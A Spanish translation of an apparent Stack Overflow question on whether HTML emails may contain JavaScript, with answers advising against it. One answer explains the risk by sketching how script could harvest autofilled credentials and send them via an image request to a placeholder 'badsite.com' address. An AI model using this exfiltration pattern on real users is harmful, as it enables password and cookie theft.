1. Inicio
  2. Pregunta y respuesta
  3. ¿Es posible/recomendable enviar correos electrónicos HTML que contengan Javascript?

¿Es posible/recomendable enviar correos electrónicos HTML que contengan Javascript?

2009-02-18 21 views
13

Esto es principalmente una pregunta retórica, por lo que he comprobado, la respuesta es "no molestes", pero quería estar realmente seguro.¿Es posible/recomendable enviar correos electrónicos HTML que contengan Javascript?

Tenemos una aplicación de correo electrónico, donde puede enviar correos electrónicos a listas de suscriptores. Esto no es spam: es utilizado, por ejemplo, por una universidad para enviar comunicaciones a sus estudiantes, por un museo para enviar correos electrónicos a suscriptores, etc.

Recientemente, un posible cliente me preguntó si era posible enviar mensajes html que contengan javascript sin ser marcados como spam.

Sin saber, hice un viaje corto de las webs y lo que tengo es (porcentajes de mi posterior) 'la mitad de los clientes no se mostrarán correctamente', 'la mitad de los clientes lo tildarán de spam' y 'la mitad de los clientes tendrán bloqueado el Javascript por completo' (claramente hay una superposición).

Así que la mejor solución parece ser agregar un enlace a una página adecuada si es realmente necesario. ¿Tienes una experiencia diferente? ¿Conoces alguna solución de combinación de correo electrónico que ofrezca esta función? ¿Sabes si los clientes específicos lo aceptan o se niegan a mostrar html con javascript?

Fuente

2009-02-18 Adriano Varoli Piazza

+2

hecho, me escribió esta pregunta por el contenido esté disponible aquí en SO, tengo que admitirlo. –

+0

Ha cubierto las 3 mitades: D – Eoin

Respuesta

8

Ha enumerado los argumentos correctos contra el uso de JavaScript en los correos electrónicos. Estos te muestran que es una mala idea. Vincular a una página donde puede usar javascript libremente es una buena opción y le permite al usuario decidir si quiere acceder a este contenido "mejorado" y cuándo quiere hacerlo.

Fuente

2009-02-18 13:32:31

+0

exactamente, deje que el usuario decida, otorgue a los suscriptores la opción de recibir una versión de solo texto o la versión pesada de javascript. –

+0

de acuerdo. los motivos que enumeró son excelentes, así que dígales "no" o "teóricamente, sí, pero es la peor idea del mundo, he aquí por qué ...". – jacobangel

0

El problema de JavaScript es que plantea una amenaza a la seguridad. Si hay un cliente de correo electrónico que lo acepta, es muy probable que sea una vulnerabilidad de seguridad y deba corregirse.

Por lo tanto, realmente, "ni siquiera molestar", porque incluso si funciona, pronto dejará de funcionar.

EDITAR: Algunas personas no parecen entender por qué es un riesgo de seguridad, así que te explicaré.

Considere el siguiente código (una de las múltiples maneras de robar contraseñas usando Javascript y clientes de correo electrónico no seguros).

Uso de JavaScript:

  1. crear un formulario con campos de entrada "contraseña" "nombre de usuario" y.
  2. Deje que el navegador recuerde automáticamente el contenido de estos campos (varios usuarios almacenan el nombre de usuario y la contraseña en la memoria del navegador para evitar tener que escribirlo y recordarlo cada vez.
  3. Una vez que ambos campos se llenan (automáticamente), envíe su contenido a su sitio web usando algo como <img src="badsite.com/senddata?username=user&password=pass">.
  4. Felicidades! has robado una contraseña!

por lo general, sólo la creación de un formulario utilizando JavaScript en su propio sitio web inseguro no es perjudicial en sí mismo ya que el navegador es inteligente suficiente para decirle a Gmail datos solo a Gmail (y generalmente no intentas robar contraseñas) desde su propio sitio web, y en ese caso habría formas más fáciles de robarlos de todos modos).

Sin embargo, si permitía JavaScript en los correos electrónicos, entonces el navegador no sería capaz de separar el JavaScript legítimo del código inseguro.

El robo de cookies también es posible si un cliente de correo electrónico no puede filtrar JavaScript.

Fuente

2009-02-18 13:35:24 luiscubal

+1

No necesariamente. No es una vulnerabilidad tener Javascript en los navegadores, ¿por qué debería estar en los correos electrónicos? –

+2

Porque JavaScript en los correos electrónicos podría obtener las cookies de correo electrónico para las contraseñas, por ejemplo, y enviarlas a un sitio diferente. – luiscubal

0

Como el spam es tan importante, me limitaría a enviar correos electrónicos básicos que son fáciles de consumir. Siempre puede vincular a una página web que tiene su javascript en él. También puede enviar un parámetro querystring en la URL para rastrear a los usuarios que están más interesados ​​en sus correos electrónicos porque esto le indicará que están haciendo clic en ellos. Entonces, si bien es posible, probablemente sea mejor evitarlo.

Fuente

2009-02-18 13:47:45 Bob

0

sí, es posible pero no recomendado. por razones de seguridad, la mayoría de los programas de administración de correo bloqueaban js o daban alerta si incluían js. si el usuario es estricto para el spam, entonces este correo también pasa al correo no deseado.

Fuente

2010-05-20 16:53:26

-1

Es una vulnerabilidad en los navegadores si los enlaces de correo electrónico a un cliente que tiene su nombre de usuario y contraseña en caché ... Los correos electrónicos generalmente se abren en los navegadores ...

Fuente

2013-01-16 18:53:37 Splendid

Cuestiones relacionadas

 Cuestiones relacionadas